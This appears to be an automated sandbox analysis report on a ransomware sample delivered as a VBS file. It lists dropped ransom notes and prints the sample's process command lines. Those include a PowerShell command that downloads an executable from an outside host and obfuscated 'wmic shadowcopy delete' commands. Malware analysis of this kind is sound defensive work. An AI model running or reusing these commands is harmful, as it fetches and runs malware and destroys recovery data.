JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\Public\AccountPictures\Decryptfiles.txt

C:\Users\Public\Decryptfiles.txt

C:\Users\Public\Documents\Decryptfiles.txt

C:\Users\Public\Downloads\Decryptfiles.txt

C:\Users\Public\Libraries\Decryptfiles.txt

C:\Users\Public\Libraries\RecordedTV.library-ms

C:\Users\Public\Libraries\RecordedTV.library-ms.tQxH (copy)

C:\Users\Public\Music\Decryptfiles.txt

C:\Users\Public\Pictures\Decryptfiles.txt

Windows Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs

Target ID:	27
Start time:	01:52:41
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	01:52:42
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Imagebase:	0xfb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	40
Start time:	01:53:08
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\eryy65ty.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Imagebase:	0x280000
File size:	902'856 bytes
MD5 hash:	2B986178DA0C3D081F99AC8FB4A5952C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	41
Start time:	01:53:13
Start date:	19/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Imagebase:	0x7ff72c250000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	43
Start time:	01:53:16
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\eryy65ty.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Imagebase:	0x280000
File size:	902'856 bytes
MD5 hash:	2B986178DA0C3D081F99AC8FB4A5952C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	44
Start time:	01:53:21
Start date:	19/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Imagebase:	0x7ff72c250000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	46
Start time:	01:53:28
Start date:	19/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Imagebase:	0x7ff72c250000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	53
Start time:	01:53:34
Start date:	19/12/2024
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Imagebase:	0x7ff71a6e0000
File size:	201'216 bytes
MD5 hash:	27F71B12CB585541885A31BE22F61C83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	55
Start time:	01:53:41
Start date:	19/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Imagebase:	0x7ff72c250000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	60
Start time:	01:53:47
Start date:	19/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
Imagebase:	0x7ff72c250000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true